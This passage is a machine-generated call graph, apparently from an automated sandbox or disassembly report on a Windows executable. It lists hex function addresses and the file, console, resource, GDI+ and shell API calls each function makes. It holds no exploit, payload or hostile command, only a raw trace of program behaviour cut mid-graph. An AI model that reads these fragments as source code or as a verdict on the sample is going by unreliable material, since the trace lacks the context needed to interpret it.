a2a0d5 25735->25681 25737 a2b8e6 3 API calls 25735->25737 25736->25681 25736->25735 25738 a2a083 25736->25738 25951 a2b199 SetEndOfFile 25736->25951 25739 a2a130 25737->25739 25952 a2b032 25738->25952 25739->25681 25985 a2237a 74 API calls 25739->25985 25742 a2a0ca 25744 a2a880 77 API calls 25742->25744 25744->25735 25745 a2a140 25986 a27871 76 API calls 25745->25986 25748 a21653 25747->25748 25750 a21665 Concurrency::cancel_current_task 25747->25750 25748->25750 26002 a216b2 25748->26002 25751 a22111 26 API calls 25750->25751 25752 a21694 25751->25752 26005 a2e339 25752->26005 25756 a2b1e9 25755->25756 25757 a2b1f3 25756->25757 26018 a277af 78 API calls 25756->26018 25757->25566 25759->25583 25761 a2c20d _abort 25760->25761 25766 a2c0d3 25761->25766 25773 a2c0b4 25766->25773 25768 a2c148 25769 a22111 25768->25769 25770 a2212b 25769->25770 25771 a2211c 25769->25771 25770->25600 25777 a2136b 26 API calls Concurrency::cancel_current_task 25771->25777 25774 a2c0c2 25773->25774 25775 a2c0bd 25773->25775 25774->25768 25776 a22111 26 API calls 25775->25776 25776->25774 25777->25770 25783 a21822 25778->25783 25781->25619 25782->25615 25784 a213f2 25783->25784 25785 a21834 25783->25785 25784->25621 25786 a2185d 25785->25786 25793 a276e9 76 API calls __vswprintf_c_l 25785->25793 25787 a4521e 22 API calls 25786->25787 25789 a2187a 25787->25789 25789->25784 25795 a2775a 75 API calls 25789->25795 25790 a21853 25794 a2775a 75 API calls 25790->25794 25793->25790 25794->25786 25795->25784 25797 a21a8a 25796->25797 25798 a21a8e 25796->25798 25797->25623 25800 a219c5 25798->25800 25801 a219d7 25800->25801 25802 a21a14 25800->25802 25803 a24264 116 API calls 25801->25803 25808 a246ce 25802->25808 25806 a219f7 25803->25806 25806->25797 25810 a246d7 25808->25810 25809 a24264 116 API calls 25809->25810 25810->25809 25812 a21a35 25810->25812 25825 a32128 25810->25825 25812->25806 25813 a21f30 25812->25813 25814 a21f3a __EH_prolog 25813->25814 25833 a242f1 25814->25833 25816 a21f61 25817 a21822 78 API calls 25816->25817 25824 a21fe8 25816->25824 25818 a21f78 25817->25818 25861 a2190b 78 API calls 25818->25861 25820 a21f90 25822 a21f9c _wcslen 25820->25822 25862 a32ed2 MultiByteToWideChar 25820->25862 25863 a2190b 78 API calls 25822->25863 25824->25806 25826 a3212f 25825->25826 25828 a3214a 25826->25828 25831 a276e4 RaiseException _com_raise_error 25826->25831 25829 a3215b SetThreadExecutionState 25828->25829 25832 a276e4 RaiseException _com_raise_error 25828->25832 25829->25810 25831->25828 25832->25829 25834 a242fb __EH_prolog 25833->25834 25835 a24311 25834->25835 25836 a2432d 25834->25836 25889 a21397 74 API calls 25835->25889 25837 a24588 25836->25837 25841 a24359 25836->25841 25901 a21397 74 API calls 25837->25901 25840 a2431c 25840->25816 25841->25840 25864 a34586 25841->25864 25843 a243da 25845 a24465 25843->25845 25860 a243d1 25843->25860 25892 a2e4a9 96 API calls 25843->25892 25844 a243d6 25844->25843 25891 a2252a 78 API calls 25844->25891 25874 a2bf0a 25845->25874 25847 a243c6 25890 a21397 74 API calls 25847->25890 25848 a243a8 25848->25843 25848->25844 25848->25847 25849 a24478 25854 a2450e 25849->25854 25855 a244fe 25849->25855 25893 a3422f 138 API calls 25854->25893 25878 a2a475 25855->25878 25858 a2450c 25858->25860 25894 a2237a 74 API calls 25858->25894 25895 a33546 25860->25895 25861->25820 25862->25822 25863->25824 25865 a3459b 25864->25865 25867 a345a5 ___std_exception_copy 25864->25867 25902 a2775a 75 API calls 25865->25902 25868 a346d5 25867->25868 25869 a3462b 25867->25869 25873 a3464f _abort 25867->25873 25904 a43340 RaiseException 25868->25904 25903 a344b9 75 API calls 3 library calls 25869->25903 25872 a34701 25873->25848 25875 a2bf18 25874->25875 25877 a2bf22 25874->25877 25876 a3febe 27 API calls 25875->25876 25876->25877 25877->25849 25879 a2a47f __EH_prolog 25878->25879 25905 a28a1f 25879->25905 25882 a213d9 78 API calls 25883 a2a492 25882->25883 25908 a2e56c 25883->25908 25885 a2a4ee 25885->25858 25886 a2a4a5 25886->25885 25887 a2e56c 133 API calls 25886->25887 25917 a2e758 97 API calls __InternalCxxFrameHandler 25886->25917 25887->25886 25889->25840 25890->25860 25891->25843 25892->25845 25893->25858 25894->25860 25896 a33550 25895->25896 25897 a33569 25896->25897 25900 a3357d 25896->25900 25918 a3220d 86 API calls 25897->25918 25899 a33570 Concurrency::cancel_current_task 25899->25900 25901->25840 25902->25867 25903->25873 25904->25872 25906 a2c619 GetVersionExW 25905->25906 25907 a28a24 25906->25907 25907->25882 25914 a2e582 __InternalCxxFrameHandler 25908->25914 25909 a2e6f2 25910 a2e726 25909->25910 25911 a2e523 6 API calls 25909->25911 25912 a32128 SetThreadExecutionState RaiseException 25910->25912 25911->25910 25915 a2e6e9 25912->25915 25913 a39cad 118 API calls 25913->25914 25914->25909 25914->25913 25914->25915 25916 a2bff5 91 API calls 25914->25916 25915->25886 25916->25914 25917->25886 25918->25899 25920 a2e3ac 25919->25920 25921 a2e3a5 25919->25921 25920->25628 25924 a2aa7a 25921->25924 25923->25630 25925 a2aa93 25924->25925 25927 a2b110 79 API calls 25925->25927 25926 a2aac5 25926->25920 25927->25926 25929 a3efb8 25928->25929 25930 a2f937 53 API calls 25929->25930 25931 a3efdb 25930->25931 25932 a24a20 _swprintf 51 API calls 25931->25932 25933 a3efed 25932->25933 25934 a3e619 16 API calls 25933->25934 25935 a32eca 25934->25935 25935->25577 25936->25642 25937->25642 25938->25644 25940 a266ef 25939->25940 25989 a265fb 25940->25989 25943 a26722 25944 a2675a 25943->25944 25994 a2c6af CharUpperW CompareStringW _wcslen ___vcrt_FlsFree 25943->25994 25944->25658 25946 a289dd 25945->25946 25947 a28a15 25946->25947 26000 a27931 74 API calls 25946->26000 25947->25657 25947->25668 25947->25672 25949 a28a0d 26001 a21397 74 API calls 25949->26001 25951->25738 25953 a2b043 25952->25953 25956 a2b052 25952->25956 25954 a2b049 FlushFileBuffers 25953->25954 25953->25956 25954->25956 25955 a2b0cf SetFileTime 25955->25742 25956->25955 25957->25650 25958->25663 25959->25659 25960->25665 25961->25696 25962->25696 25963->25696 25964->25696 25965->25696 25966->25703 25967->25703 25968->25675 25969->25686 25970->25680 25971->25686 25973 a29b2b 25972->25973 25974 a2ab25 GetFileType 25972->25974 25973->25684 25975 a2237a 74 API calls 25973->25975 25974->25973 25975->25705 25976->25684 25977->25707 25978->25733 25979->25733 25980->25728 25981->25733 25982->25733 25983->25733 25984->25736 25985->25745 25986->25681 25987->25657 25988->25657 25995 a264f8 25989->25995 25991 a2661c 25991->25943 25993 a264f8 2 API calls 25993->25991 25994->25943 25998 a26502 25995->25998 25996 a265ea 25996->25991 25996->25993 25998->25996 25999 a2c6af CharUpperW CompareStringW _wcslen ___vcrt_FlsFree 25998->25999 25999->25998 26000->25949 26001->25947 26011 a220ed 26 API calls Concurrency::cancel_current_task 26002->26011 26004 a216c0 26006 a2e34a Concurrency::cancel_current_task 26005->26006 26012 a2bd8e 26006->26012 26008 a2e37c 26009 a2bd8e 86 API calls 26008->26009 26010 a2e387 26009->26010 26011->26004 26013 a2bdb1 26012->26013 26016 a2bdc5 Concurrency::cancel_current_task 26012->26016 26017 a3220d 86 API calls 26013->26017 26015 a2bdb8 Concurrency::cancel_current_task 26015->26016 26016->26008 26017->26015 26018->25757 26020 a2baa1 26019->26020 26021 a2bb20 FindNextFileW 26020->26021 26022 a2baba FindFirstFileW 26020->26022 26023 a2bb02 26021->26023 26024 a2bb2b GetLastError 26021->26024 26022->26023 26025 a2bac9 26022->26025 26023->25587 26024->26023 26026 a2cf32 GetCurrentDirectoryW 26025->26026 26027 a2bad9 26026->26027 26028 a2baf7 GetLastError 26027->26028 26029 a2badd FindFirstFileW 26027->26029 26028->26023 26029->26023 26029->26028 26032 a2a425 26030->26032 26033 a2a458 _abort 26030->26033 26031 a2b470 3 API calls 26031->26032 26032->26031 26032->26033 26033->25511 26034->25402 26035->25408 26036->25408 26037->25411 26038->25419 26040 a2b1d2 78 API calls 26039->26040 26041 a2208f 26040->26041 26042 a21ad3 116 API calls 26041->26042 26045 a220ac 26041->26045 26043 a2209c 26042->26043 26043->26045 26046 a21397 74 API calls 26043->26046 26045->25427 26045->25428 26046->26045 26106 a3d8d8 98 API calls 4 library calls 26149 a44bd0 5 API calls _ValidateLocalCookies 26049 a2acd4 26052 a2acde 26049->26052 26050 a2ae2c SetFilePointer 26051 a2ae49 GetLastError 26050->26051 26054 a2acf4 26050->26054 26051->26054 26052->26050 26053 a2ae05 26052->26053 26052->26054 26055 a2aa7a 79 API calls 26052->26055 26053->26050 26055->26053 26077 a3d420 91 API calls _swprintf 23967 a4a620 23975 a4bf6f 23967->23975 23970 a4a634 23972 a4a63c 23973 a4a649 23972->23973 23983 a4a650 11 API calls 23972->23983 23984 a4be58 23975->23984 23978 a4bfae TlsAlloc 23979 a4bf9f 23978->23979 23991 a40d7c 23979->23991 23981 a4a62a 23981->23970 23982 a4a599 20 API calls 2 library calls 23981->23982 23982->23972 23983->23970 23985 a4be88 23984->23985 23988 a4be84 23984->23988 23985->23978 23985->23979 23986 a4bea8 23986->23985 23989 a4beb4 GetProcAddress 23986->23989 23988->23985 23988->23986 23998 a4bef4 23988->23998 23990 a4bec4 __dosmaperr 23989->23990 23990->23985 23992 a40d84 23991->23992 23993 a40d85 IsProcessorFeaturePresent 23991->23993 23992->23981 23995 a40dc7 23993->23995 24005 a40d8a SetUnhandledExceptionFilter UnhandledExceptionFilter GetCurrentProcess TerminateProcess 23995->24005 23997 a40eaa 23997->23981 23999 a4bf15 LoadLibraryExW 23998->23999 24000 a4bf0a 23998->24000 24001 a4bf32 GetLastError 23999->24001 24002 a4bf4a 23999->24002 24000->23988 24001->24002 24004 a4bf3d LoadLibraryExW 24001->24004 24002->24000 24003 a4bf61 FreeLibrary 24002->24003 24003->24000 24004->24002 24005->23997 26078 a21025 29 API calls 24064 a3f32b 14 API calls ___delayLoadHelper2@8 26079 a3742e 138 API calls __InternalCxxFrameHandler 26130 a4962a 55 API calls _free 24068 a3f431 24070 a3f335 24068->24070 24069 a3f9e9 ___delayLoadHelper2@8 14 API calls 24069->24070 24070->24069 26080 a22430 26 API calls std::bad_exception::bad_exception 26151 a49330 52 API calls 3 library calls 26081 a22037 143 API calls __EH_prolog 26110 a30534 FreeLibrary 26152 a40733 20 API calls 24124 a2213d 24125 a22148 24124->24125 24127 a22150 24124->24127 24143 a22162 27 API calls Concurrency::cancel_current_task 24125->24143 24128 a2214e 24127->24128 24130 a3febe 24127->24130 24131 a3fec3 ___std_exception_copy 24130->24131 24132 a3fedd 24131->24132 24134 a3fedf 24131->24134 24146 a48e5c 7 API calls 2 library calls 24131->24146 24132->24128 24135 a248f5 Concurrency::cancel_current_task 24134->24135 24136 a3fee9 24134->24136 24144 a43340 RaiseException 24135->24144 24147 a43340 RaiseException 24136->24147 24138 a24911 24140 a24927 24138->24140 24145 a2136b 26 API calls Concurrency::cancel_current_task 24138->24145 24140->24128 24141 a40820 24143->24128 24144->24138 24145->24140 24146->24131 24147->24141 24148 a3f002 24149 a3f00f 24148->24149 24156 a2f937 24149->24156 24157 a2f947 24156->24157 24168 a2f968 24157->24168 24160 a24a20 24191 a249f3 24160->24191 24163 a3c758 PeekMessageW 24164 a3c773 GetMessageW 24163->24164 24165 a3c7ac 24163->24165 24166 a3c789 IsDialogMessageW 24164->24166 24167 a3c798 TranslateMessage DispatchMessageW 24164->24167 24166->24165 24166->24167 24167->24165 24174 a2ecd0 24168->24174 24171 a2f965 24171->24160 24172 a2f98b LoadStringW 24172->24171 24173 a2f9a2 LoadStringW 24172->24173 24173->24171 24179 a2ec0c 24174->24179 24176 a2eced 24177 a2ed02 24176->24177 24187 a2ed10 26 API calls 24176->24187 24177->24171 24177->24172 24180 a2ec24 24179->24180 24186 a2eca4 _strncpy 24179->24186 24182 a2ec48 24180->24182 24188 a330f5 WideCharToMultiByte 24180->24188 24185 a2ec79 24182->24185 24189 a2f8d1 50 API calls __vsnprintf 24182->24189 24190 a47571 26 API calls 3 library calls 24185->24190 24186->24176 24187->24177 24188->24182 24189->24185 24190->24186 24192 a24a0a __vsnwprintf_l 24191->24192 24195 a472e2 24192->24195 24198 a453a5 24195->24198 24199 a453e5 24198->24199 24200 a453cd 24198->24200 24199->24200 24201 a453ed 24199->24201 24215 a4a7eb 20 API calls __dosmaperr 24200->24215 24217 a45944 24201->24217 24203 a453d2 24216 a451b9 26 API calls ___std_exception_copy 24203->24216 24207 a40d7c _ValidateLocalCookies 5 API calls 24209 a24a14 SetDlgItemTextW 24207->24209 24209->24163 24210 a45475 24226 a45cf4 51 API calls 4 library calls 24210->24226 24213 a45480 24227 a459c7 20 API calls _free 24213->24227 24214 a453dd 24214->24207 24215->24203 24216->24214 24218 a45961 24217->24218 24224 a453fd 24217->24224 24218->24224 24228 a4a515 GetLastError 24218->24228 24220 a45982 24248 a4aaf6 38 API calls __fassign 24220->24248 24222 a4599b 24249 a4ab23 38 API calls __fassign 24222->24249 24225 a4590f 20 API calls 2 library calls 24224->24225 24225->24210 24226->24213 24227->24214 24229 a4a531 24228->24229 24230 a4a52b 24228->24230 24233 a4a580 SetLastError 24229->24233 24251 a4c2f6 24229->24251 24250 a4c01b 11 API calls 2 library calls 24230->24250 24233->24220 24235 a4a54b 24258 a4a66a 24235->24258 24237 a4a560 24237->24235 24239 a4a567 24237->24239 24265 a4a380 20 API calls __dosmaperr 24239->24265 24240 a4a551 24242 a4a58c SetLastError 24240->24242 24266 a4a0f4 38 API calls _abort 24242->24266 24243 a4a572 24245 a4a66a _free 20 API calls 24243->24245 24247 a4a579 24245->24247 24247->24233 24247->24242 24248->24222 24249->24224 24250->24229 24256 a4c303 __dosmaperr 24251->24256 24252 a4c343 24268 a4a7eb 20 API calls __dosmaperr 24252->24268 24253 a4c32e RtlAllocateHeap 24255 a4a543 24253->24255 24253->24256 24255->24235 24264 a4c071 11 API calls 2 library calls 24255->24264 24256->24252 24256->24253 24267 a48e5c 7 API calls 2 library calls 24256->24267 24259 a4a675 RtlFreeHeap 24258->24259 24263 a4a69e __dosmaperr 24258->24263 24260 a4a68a 24259->24260 24259->24263 24269 a4a7eb 20 API calls __dosmaperr 24260->24269 24262 a4a690 GetLastError 24262->24263 24263->24240 24264->24237 24265->24243 24267->24256 24268->24255 24269->24262 26082 a21800 86 API calls Concurrency::cancel_current_task 26133 a40600 27 API calls 26111 a53100 CloseHandle 24271 a2b20a 24272 a2b218 24271->24272 24273 a2b21f 24271->24273 24274 a2b22c GetStdHandle 24273->24274 24281 a2b23b 24273->24281 24274->24281 24275 a2b293 WriteFile 24275->24281 24276 a2b264 WriteFile 24277 a2b25f 24276->24277 24276->24281 24277->24276 24277->24281 24279 a2b325 24283 a27951 77 API calls 24279->24283 24281->24272 24281->24275 24281->24276 24281->24277 24281->24279 24282 a2765a 78 API calls 24281->24282 24282->24281 24283->24272 26154 a32f0b GetCPInfo IsDBCSLeadByte 26084 a3b410 GdipDisposeImage GdipFree 24289 a4d211 31 API calls _ValidateLocalCookies 26157 a3c316 GetDlgItem KiUserCallbackDispatcher ShowWindow SendMessageW 24291 a40612 24292 a4061e __FrameHandler3::FrameUnwindToState 24291->24292 24323 a401ac 24292->24323 24294 a40625 24295 a40778 24294->24295 24298 a4064f 24294->24298 24400 a40a0a IsProcessorFeaturePresent IsDebuggerPresent SetUnhandledExceptionFilter UnhandledExceptionFilter _abort 24295->24400 24297 a4077f 24393 a4931a 24297->24393 24308 a4068e ___scrt_is_nonwritable_in_current_image ___scrt_release_startup_lock 24298->24308 24334 a49ebd 24298->24334 24305 a4066e 24307 a406ef 24342 a40b25 GetStartupInfoW _abort 24307->24342 24308->24307 24396 a48e0c 38 API calls 2 library calls 24308->24396 24310 a406f5 24343 a49e0e 51 API calls 24310->24343 24313 a406fd 24344 a3f05c 24313->24344 24317 a40711 24317->24297 24318 a40715 24317->24318 24319 a4071e 24318->24319 24398 a492bd 28 API calls _abort 24318->24398 24399 a4031d 12 API calls ___scrt_uninitialize_crt 24319->24399 24322 a40726 24322->24305 24324 a401b5 24323->24324 24402 a40826 IsProcessorFeaturePresent 24324->24402 24326 a401c1 24403 a43bee 24326->24403 24328 a401c6 24333 a401ca 24328->24333 24411 a49d47 24328->24411 24331 a401e1 24331->24294 24333->24294 24337 a49ed4 24334->24337 24335 a40d7c _ValidateLocalCookies 5 API calls 24336 a40668 24335->24336 24336->24305 24338 a49e61 24336->24338 24337->24335 24339 a49e90 24338->24339 24340 a40d7c _ValidateLocalCookies 5 API calls 24339->24340 24341 a49eb9 24340->24341 24341->24308 24342->24310 24343->24313 24502 a31b83 24344->24502 24348 a3f07c 24551 a3bd1b 24348->24551 24350 a3f085 _abort 24351 a3f098 GetCommandLineW 24350->24351 24352 a3f0ab 24351->24352 24353 a3f13c GetModuleFileNameW SetEnvironmentVariableW GetLocalTime 24351->24353 24555 a3d708 24352->24555 24354 a24a20 _swprintf 51 API calls 24353->24354 24357 a3f1a3 SetEnvironmentVariableW GetModuleHandleW LoadIconW 24354->24357 24566 a3c8cd LoadBitmapW 24357->24566 24358 a3f136 24560 a3ed2e 24358->24560 24359 a3f0b9 OpenFileMappingW 24362 a3f0d1 MapViewOfFile 24359->24362 24363 a3f12d CloseHandle 24359->24363 24365 a3f0e2 __InternalCxxFrameHandler 24362->24365 24366 a3f126 UnmapViewOfFile 24362->24366 24363->24353 24370 a3ed2e 2 API calls 24365->24370 24366->24363 24372 a3f0fe 24370->24372 24604 a3069c 82 API calls 24372->24604 24373 a3a0d7 27 API calls 24375 a3f203 DialogBoxParamW 24373->24375 24379 a3f23d 24375->24379 24376 a3f112 24605 a30752 82 API calls _wcslen 24376->24605 24378 a3f11d 24378->24366 24380 a3f256 24379->24380 24381 a3f24f Sleep 24379->24381 24384 a3f264 24380->24384 24593 a3bfb3 24380->24593 24381->24380 24383 a3f283 DeleteObject 24385 a3f298 DeleteObject 24383->24385 24387 a3f29f 24383->24387 24384->24383 24385->24387 24386 a3f2d0 24606 a3ed8b WaitForSingleObject 24386->24606 24387->24386 24389 a3f2e2 24387->24389 24601 a3bd81 24389->24601 24392 a3f31c 24397 a40b5b GetModuleHandleW 24392->24397 24796 a49097 24393->24796 24396->24307 24397->24317 24398->24319 24399->24322 24400->24297 24402->24326 24415 a44c97 24403->24415 24406 a43bf7 24406->24328 24408 a43bff 24409 a43c0a 24408->24409 24429 a44cd3 DeleteCriticalSection 24408->24429 24409->24328 24456 a4d21a 24411->24456 24414 a43c0d 7 API calls 2 library calls 24414->24333 24416 a44ca0 24415->24416 24418 a44cc9 24416->24418 24420 a43bf3 24416->24420 24430 a44edc 24416->24430 24435 a44cd3 DeleteCriticalSection 24418->24435 24420->24406 24421 a43d1c 24420->24421 24449 a44ded 24421->24449 24424 a43d31 24424->24408 24426 a43d3f 24427 a43d4c 24426->24427 24455 a43d4f 6 API calls ___vcrt_FlsFree 24426->24455 24427->24408 24429->24406 24436 a44d02 24430->24436 24433 a44f14 InitializeCriticalSectionAndSpinCount 24434 a44eff 24433->24434 24434->24416 24435->24420 24437 a44d1f 24436->24437 24441 a44d23 24436->24441 24437->24433 24437->24434 24438 a44d8b GetProcAddress 24438->24437 24440 a44d99 24438->24440 24440->24437 24441->24437 24441->24438 24442 a44d7c 24441->24442 24444 a44da2 LoadLibraryExW 24441->24444 24442->24438 24443 a44d84 FreeLibrary 24442->24443 24443->24438 24445 a44db9 GetLastError 24444->24445 24446 a44de9 24444->24446 24445->24446 24447 a44dc4 ___vcrt_FlsFree 24445->24447 24446->24441 24447->24446 24448 a44dda LoadLibraryExW 24447->24448 24448->24441 24450 a44d02 ___vcrt_FlsFree 5 API calls 24449->24450 24451 a44e07 24450->24451 24452 a44e20 TlsAlloc 24451->24452 24453 a43d26 24451->24453 24453->24424 24454 a44e9e 6 API calls ___vcrt_FlsFree 24453->24454 24454->24426 24455->24424 24457 a4d237 24456->24457 24458 a4d233 24456->24458 24457->24458 24462 a4b860 24457->24462 24459 a40d7c _ValidateLocalCookies 5 API calls 24458->24459 24460 a401d3 24459->24460 24460->24331 24460->24414 24463 a4b86c __FrameHandler3::FrameUnwindToState 24462->24463 24474 a4bdf1 EnterCriticalSection 24463->24474 24465 a4b873 24475 a4d6e8 24465->24475 24467 a4b882 24473 a4b891 24467->24473 24488 a4b6e9 29 API calls 24467->24488 24470 a4b8a2 _abort 24470->24457 24471 a4b88c 24489 a4b79f GetStdHandle GetFileType 24471->24489 24490 a4b8ad LeaveCriticalSection _abort 24473->24490 24474->24465 24476 a4d6f4 __FrameHandler3::FrameUnwindToState 24475->24476 24477 a4d701 24476->24477 24478 a4d718 24476->24478 24499 a4a7eb 20 API calls __dosmaperr 24477->24499 24491 a4bdf1 EnterCriticalSection 24478->24491 24481 a4d706 24500 a451b9 26 API calls ___std_exception_copy 24481->24500 24483 a4d750 24501 a4d777 LeaveCriticalSection _abort 24483->24501 24484 a4d710 _abort 24484->24467 24485 a4d724 24485->24483 24492 a4d639 24485->24492 24488->24471 24489->24473 24490->24470 24491->24485 24493 a4c2f6 __dosmaperr 20 API calls 24492->24493 24494 a4d64b 24493->24494 24496 a4c0ca 11 API calls 24494->24496 24498 a4d658 24494->24498 24495 a4a66a _free 20 API calls 24497 a4d6aa 24495->24497 24496->24494 24497->24485 24498->24495 24499->24481 24500->24484 24501->24484 24612 a3ffd0 24502->24612 24505 a31c07 24507 a31f34 GetModuleFileNameW 24505->24507 24623 a489ee 42 API calls 2 library calls 24505->24623 24506 a31ba8 GetProcAddress 24508 a31bc1 24506->24508 24509 a31bd9 GetProcAddress 24506->24509 24518 a31f52 24507->24518 24508->24509 24511 a31beb 24509->24511 24511->24505 24512 a31e74 24512->24507 24513 a31e7f GetModuleFileNameW CreateFileW 24512->24513 24514 a31f28 CloseHandle 24513->24514 24515 a31eaf SetFilePointer 24513->24515 24514->24507 24515->24514 24516 a31ebd ReadFile 24515->24516 24516->24514 24520 a31edb 24516->24520 24521 a31fb4 GetFileAttributesW 24518->24521 24523 a31f7d CompareStringW 24518->24523 24524 a31fcc 24518->24524 24614 a2c619 24518->24614 24617 a31b3b 24518->24617 24520->24514 24522 a31b3b 2 API calls 24520->24522 24521->24518 24521->24524 24522->24520 24523->24518 24525 a31fd7 24524->24525 24528 a3200c 24524->24528 24527 a31ff0 GetFileAttributesW 24525->24527 24529 a32008 24525->24529 24526 a3211b 24550 a3b65d GetCurrentDirectoryW 24526->24550 24527->24525 24527->24529 24528->24526 24530 a2c619 GetVersionExW 24528->24530 24529->24528 24531 a32026 24530->24531 24532 a32093 24531->24532 24533 a3202d 24531->24533 24534 a24a20 _swprintf 51 API calls 24532->24534 24535 a31b3b 2 API calls 24533->24535 24537 a320bb AllocConsole 24534->24537 24536 a32037 24535->24536 24538 a31b3b 2 API calls 24536->24538 24539 a32113 ExitProcess 24537->24539 24540 a320c8 GetCurrentProcessId AttachConsole 24537->24540 24541 a32041 24538->24541 24624 a44fa3 24540->24624 24544 a2f937 53 API calls 24541->24544 24543 a320e9 GetStdHandle WriteConsoleW Sleep FreeConsole 24543->24539 24545 a3205c 24544->24545 24546 a24a20 _swprintf 51 API calls 24545->24546 24547 a3206f 24546->24547 24548 a2f937 53 API calls 24547->24548 24549 a3207e 24548->24549 24549->24539 24550->24348 24552 a31b3b 2 API calls 24551->24552 24553 a3bd2f OleInitialize 24552->24553 24554 a3bd52 GdiplusStartup SHGetMalloc 24553->24554 24554->24350 24559 a3d712 24555->24559 24556 a3d828 24556->24358 24556->24359 24557 a33307 CharUpperW 24557->24559 24559->24556 24559->24557 24626 a30752 82 API calls _wcslen 24559->24626 24561 a3ffd0 24560->24561 24562 a3ed3b SetEnvironmentVariableW 24561->24562 24564 a3ed5e 24562->24564 24563 a3ed86 24563->24353 24564->24563 24565 a3ed7a SetEnvironmentVariableW 24564->24565 24565->24563 24567 a3c8fb GetObjectW 24566->24567 24568 a3c8ee 24566->24568 24572 a3c90a 24567->24572 24632 a3b6d2 FindResourceW 24568->24632 24627 a3b5d6 24572->24627 24574 a3c960 24585 a2ed62 24574->24585 24575 a3c93c 24646 a3b615 GetDC GetDeviceCaps GetDeviceCaps ReleaseDC 24575->24646 24577 a3b6d2 12 API calls 24579 a3c92d 24577->24579 24578 a3c944 24647 a3b5f4 GetDC GetDeviceCaps GetDeviceCaps ReleaseDC 24578->24647 24579->24575 24581 a3c933 DeleteObject 24579->24581 24581->24575 24582 a3c94d 24648 a3b81c 8 API calls 24582->24648 24584 a3c954 DeleteObject 24584->24574 24659 a2ed87 24585->24659 24590 a3a0d7 24591 a3febe 27 API calls 24590->24591 24592 a3a0f6 24591->24592 24592->24373 24595 a3bfc0 24593->24595 24594 a3c04e 24594->24384 24595->24594 24792 a33338 24595->24792 24597 a3bfe8 24597->24594 24795 a3bc19 SetCurrentDirectoryW 24597->24795 24599 a3bff6 _abort _wcslen 24600 a3c02a SHFileOperationW 24599->24600 24600->24594 24602 a3bdb0 GdiplusShutdown OleUninitialize 24601->24602 24602->24392 24604->24376 24605->24378 24607 a3eda6 24606->24607 24608 a3edeb CloseHandle 24606->24608 24609 a3eda9 PeekMessageW 24607->24609 24608->24389 24610 a3edbb GetMessageW TranslateMessage DispatchMessageW 24609->24610 24611 a3eddc WaitForSingleObject 24609->24611 24610->24611 24611->24608 24611->24609 24613 a31b8d GetModuleHandleW 24612->24613 24613->24505 24613->24506 24615 a2c669 24614->24615 24616 a2c62d GetVersionExW 24614->24616 24615->24518 24616->24615 24618 a3ffd0 24617->24618 24619 a31b48 GetSystemDirectoryW 24618->24619 24620 a31b60 24619->24620 24621 a31b7e 24619->24621 24622 a31b71 LoadLibraryW 24620->24622 24621->24518 24622->24621 24623->24512 24625 a44fab 24624->24625 24625->24543 24625->24625 24626->24559 24649 a3b5f4 GetDC GetDeviceCaps GetDeviceCaps ReleaseDC 24627->24649 24629 a3b5dd 24630 a3b5e9 24629->24630 24650 a3b615 GetDC GetDeviceCaps GetDeviceCaps ReleaseDC 24629->24650 24630->24574 24630->24575 24630->24577 24633 a3b6f5 SizeofResource 24632->24633 24634 a3b7e3 24632->24634 24633->24634 24635 a3b70c LoadResource 24633->24635 24634->24567 24634->24572 24635->24634 24636 a3b721 LockResource 24635->24636 24636->24634 24637 a3b732 GlobalAlloc 24636->24637 24637->24634 24638 a3b74d GlobalLock 24637->24638 24639 a3b7dc GlobalFree 24638->24639 24640 a3b75c __InternalCxxFrameHandler 24638->24640 24639->24634 24641 a3b7d5 GlobalUnlock 24640->24641 24651 a3b636 GdipAlloc 24640->24651 24641->24639 24644 a3b7c0 24644->24641 24645 a3b7aa GdipCreateHBITMAPFromBitmap 24645->24644 24646->24578 24647->24582 24648->24584 24649->24629 24650->24630 24652 a3b655 24651->24652 24653 a3b648 24651->24653 24652->24641 24652->24644 24652->24645 24655 a3b3c8 24653->24655 24656 a3b3f0 GdipCreateBitmapFromStream 24655->24656 24657 a3b3e9 GdipCreateBitmapFromStreamICM 24655->24657 24658 a3b3f5 24656->24658 24657->24658 24658->24652 24660 a2ed95 __EH_prolog 24659->24660 24661 a2edc4 GetModuleFileNameW 24660->24661 24662 a2edf5 24660->24662 24663 a2edde 24661->24663 24705 a2ab40 24662->24705 24663->24662 24665 a2ee51 24716 a47730 24665->24716 24667 a2f581 78 API calls 24670 a2ee25 24667->24670 24670->24665 24670->24667 24696 a2f06a 24670->24696 24671 a2ee64 24672 a47730 26 API calls 24671->24672 24680 a2ee76 ___vcrt_FlsFree 24672->24680 24673 a2efa5 24673->24696 24752 a2b000 81 API calls 24673->24752 24677 a2efbf ___std_exception_copy 24678 a2ae60 82 API calls 24677->24678 24677->24696 24681 a2efe8 ___std_exception_copy 24678->24681 24680->24673 24680->24696 24730 a2b110 24680->24730 24746 a2ae60 24680->24746 24751 a2b000 81 API calls 24680->24751 24681->24696 24700 a2eff3 _wcslen ___std_exception_copy ___vcrt_FlsFree 24681->24700 24753 a32ed2 MultiByteToWideChar 24681->24753 24683 a2f479 24688 a2f4fe 24683->24688 24759 a4a09e 26 API calls ___std_exception_copy 24683->24759 24685 a2f48e 24760 a48a18 26 API calls ___std_exception_copy 24685->24760 24687 a2f534 24693 a47730 26 API calls 24687->24693 24688->24687 24692 a2f581 78 API calls 24688->24692 24690 a2f4e6 24761 a2f59c 78 API calls 24690->24761 24692->24688 24694 a2f54d 24693->24694 24695 a47730 26 API calls 24694->24695 24695->24696 24739 a2a801 24696->24739 24698 a330f5 WideCharToMultiByte 24698->24700 24700->24683 24700->24696 24700->24698 24754 a2f8d1 50 API calls __vsnprintf 24700->24754 24755 a47571 26 API calls 3 library calls 24700->24755 24756 a4a09e 26 API calls ___std_exception_copy 24700->24756 24757 a48a18 26 API calls ___std_exception_copy 24700->24757 24758 a2f59c 78 API calls 24700->24758 24703 a2f5be GetModuleHandleW FindResourceW 24704 a2ed75 24703->24704 24704->24590 24706 a2ab4a 24705->24706 24707 a2abab CreateFileW 24706->24707 24708 a2abcc GetLastError 24707->24708 24711 a2ac1b 24707->24711 24762 a2cf32 24708->24762 24710 a2abec 24710->24711 24713 a2abf0 CreateFileW GetLastError 24710->24713 24712 a2ac5f 24711->24712 24714 a2ac45 SetFileTime 24711->24714 24712->24670 24713->24711 24715 a2ac15 24713->24715 24714->24712 24715->24711 24717 a47769 24716->24717 24718 a4776d 24717->24718 24729 a47795 24717->24729 24766 a4a7eb 20 API calls __dosmaperr 24718->24766 24720 a47772 24767 a451b9 26 API calls ___std_exception_copy 24720->24767 24721 a47ab9 24723 a40d7c _ValidateLocalCookies 5 API calls 24721->24723 24725 a47ac6 